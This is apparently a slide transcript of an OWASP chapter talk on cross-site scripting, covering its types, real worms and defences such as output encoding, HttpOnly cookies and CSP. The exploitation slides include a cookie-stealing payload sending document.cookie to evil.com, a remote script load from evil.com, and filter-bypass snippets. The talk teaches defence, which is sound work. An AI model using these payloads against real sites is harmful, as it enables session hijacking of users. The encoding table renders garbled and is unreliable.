owasp top 10 a3: cross site scripting (xss)
DESCRIPTION
A talk I gave for the OWASP UAE chapter in Dubai, explaining A3 from the OWASP Top 10 list: Cross Site Scripting.TRANSCRIPT
Talk Outline
• What is XSS?• Real life examples• How to exploit it?• How to prevent it?
What is XSS?
• Cross Site Scripting (XSS) • An attack against other clients
What is XSS? (2)
• Webpages are a mix of content, style and code– We want to inject code
<html> <head> <style>h1 { color: #FF0000 }</style> </head> <body> <h1>Hello World</h1> <script> document.write(“How are you?”); </script> </body></html>
Style
Content
Code
What is XSS? (3)
• Request:
http://site.com/hello.php?name=<script>alert(“hacked!”);</script>
• Response: <html> <body> <div> Hello <script>alert(“hacked!”);</script>! </div> </body> </html>
What can be done with XSS?
• Execute “Active content”– Client side scripts (usually JavaScript, vbscript, …)
• Access cookie contents– Steal your session
• Read keystrokes• Submit forms, send data, …• Exploit browser bugs
Real Life Examples
• MySpace Worm “Samy”[1]
– Visiting infected profile would addauthor as “friend”.
– Infect own profile, thus infecting other friends– 1.000.000 infections in 20 hours
• TweetDeck XSS Worm[2]
– Users automatically retweeted malicious code– 80.000 infections
[1] http://namb.la/popular/[2] http://www.forbes.com/sites/davelewis/2014/06/11/twitter-experiences-xss-flaw-in-tweetdeck/
Real Life Examples (2)
• Facebook[1]
– Vulnerable to cross site scripting– Luckily, reported to Facebook security team
• Yahoo! services[2]
– 100’s of yahoo’s subdomains vulnerable– Basically everything with a comment
[1] https://www.acunetix.com/websitesecurity/xss-facebook/[2] http://nahamsec.com/2014/05/how-i-xssed-all-of-yahoos-services/
How to exploit XSS?
• Try to display your code to somebody else• 3 Types of XSS
– Stored XSS• Persistent XSS• Malicious payload is stored in DB and is run by others
– Reflected XSS• Non persistent• Payload is embedded in URL• Victim visits malicious URL and gets exploited
– DOM based XSS• Payload executed by modifying DOM environment• Can be persistent / non-persistent
How to exploit stored XSS?
• Requirements: – Web page that saves user input– Displays unfiltered* input back to others• Same page (comment, posts on a forum, …)• Other page (in app messages, ads, profile …)
*: Unfiltered or inadequately filtered
How to exploit stored XSS? (2)
• Career website
First name: JohnLast name: Doe<script>document.write(‘<img src=“http://evil.com/a.gif?’ + escape(document.cookie) +’”/>’)</script>
Evil.com
Inject active content
Access “resume”
Unknowingly sends c
ookie
contents
to external w
ebsite
Cookie contains session ID, attacker can log in as victim.
HR ManagerAttacker
How to exploit reflected XSS?
• Requirements: – Web page that displays unfiltered* part of the URL– Convince victim to click on a link• Using “social engineering”, email, IM, …• May bypass phishing attacks (correct domain)• Payload can be obfuscated
*: Unfiltered or inadequately filtered
How to exploit reflected XSS? (2)
• Career websiteHey, this candidate seems interesting! http://site.com/search_cv.aspx?name=<script src=“http://evil.com/a.js”></script>
Evil.com
Victim loads malicious JavaScript
How to exploit DOM XSS?
• When webpage modifies the DOM (Document Object Model)
http://site.com/page.php#<script>alert(‘xss’);</script>
<html> … <script type=“text/javascript” src=“jquery.js”></script> <script> $(“#mydiv”).after(“Site is at : “ + document.location.href); </script> <div id=“mydiv”></div> …</html>
How to prevent XSS?
• Clients: Disable JavaScript • Web Application Firewall– Microsoft IIS Secure Parameter Filtering
ISS module that only accepts untampered inputhttps://spf.codeplex.com/
– ModSecurityOpensource WAF module to detect and block attackshttp://modsecurity.org
How to prevent XSS? (2)
• Solve the problem at the core:• Code refactoring– Data input filtering• Make sure we don’t accept / store any unwanted data
– Data output filtering / encoding• Even if we have unwanted data, escape it so we don’t
execute JavaScript
How to prevent XSS? (3)
• Convert output characters– Encoded characters will not be interpreted
Original Encoded
& &
< <
> >
“ "
‘ '
/ /
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
How to prevent XSS? (4)
• It’s not just about stripping out HTML tags– If you only filter out “<script>”:
<scr<script>ipt>
• Injection can happen in many places:– Event handlers:
<body onload=“alert(‘xss’);”>
– CSS<p style=“background:url(‘javascript:alert(123)’);”>
– URLS<img title=something onclick=alert(1) ...> Look ma, no quotes!
How to prevent XSS? (5)
• Useful code libraries– Owasp HTML Sanitizer Project
https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
– Microsoft Web Protection Libraryhttp://wpl.codeplex.com/
– Microsoft AntiXSS Libraryhttp://www.microsoft.com/en-us/download/details.aspx?id=43126
– HTML Purifierhttp://htmlpurifier.org/
XSS Mitigations
• use HttpOnly cookies– Will prevent JS from accessing cookies
Cache-Control: privateContent-Length: 150Content-Type: text/html; charset=utf-8Date: Mon, 25 Aug 2014 10:26:07 GMTLocation: /fvquickpay/frmPayOnline.aspxServer: Microsoft-IIS/8.5Set-Cookie: ASP.NET_SessionId=iqqkkt55il3ynxuqi1dckk55; path=/; HttpOnlyX-Aspnet-Version: 2.0.50727X-Powered-By: ASP.NET
XSS Mitigations (2)
• Implement CSP– Content Security Policy– White list origins of external data
Content-Security-Policy: default-src: 'self'; script-src: 'self' static.domain.tld
Allow JS, CSS and images from same host. Allow JS also from static.domain.tld.
XSS Mitigations (3)
• Instruct to disable XSS protection on IE/Chrome
X-XSS-Protection: 1; mode=block0 Disable XSS protection
1 Enables XSS protection
1; mode=block Enabled, blocks page instead of sanitizing
1; report=url Enabled, allow report to be sent to specific URL
Source: http://blog.veracode.com/2014/03/guidelines-for-setting-security-headers/
Conclusion
• You’re not the target, your users are– Customers, sysadmins, …
• Don’t trust anything coming from user– Even if it’s stored in the DB– Check it server side, always.
• Filter using whitelists, not blacklists• Layered security measures• Escape all output
Questions?
Michael [email protected] | @ndrix
Further reading:https://www.owasp.org/index.php/XSS_Prevention_Cheat_Sheethttps://html5sec.org/http://securityoverride.org/filedb/file_db/Articles/xss.pdf